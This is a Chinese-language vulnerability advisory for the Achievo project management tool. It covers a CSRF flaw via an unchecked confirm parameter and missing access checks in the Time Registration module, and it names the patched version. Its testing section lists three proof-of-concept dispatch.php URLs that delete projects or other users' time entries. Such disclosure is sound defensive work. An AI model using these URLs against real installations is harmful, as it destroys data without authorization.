发布日期：2010-09-27
更新日期：2010-09-29

受影响系统：

Achievo Achievo <= 1.4.3

不受影响系统：

Achievo Achievo 1.4.5

描述：

---

BUGTRAQ  ID: 43544

Achievo是一款基于WEB的用于商业环境的项目管理工具。

Achievo没有正确地验证用户所提供URL中的confirm参数，已登录用户受骗跟随了恶意链接就可能导致未经确认便删除项目或任务；此外Time Registration模块在添加或删除项目时间时没有正确地处理访问权限，用户可以非授权添加或删除其他用户的时间。

<*来源：Pablo G. Milano
  
  链接：http://secunia.com/advisories/41617/
        http://marc.info/?l=full-disclosure&m=128568803712054&q=p5
        http://marc.info/?l=full-disclosure&m=128568792811864&q=p5
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://server/dispatch.php?atknodetype=project.project&atkselector=project.id='XXXX'&atkaction=delete&atklevel=1&atkprevlevel=0&confirm=Yes
（其中XXXX是项目的ID号）

http://server/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX'&confirm=Yes
（其中XXXX是所要删除活动的实际ID）

http://server/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX'
（其中XXXX是所要删除活动的实际ID）

建议：

---

厂商补丁：

Achievo
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.achievo.org

浏览次数：2051
严重程度：0（网友投票）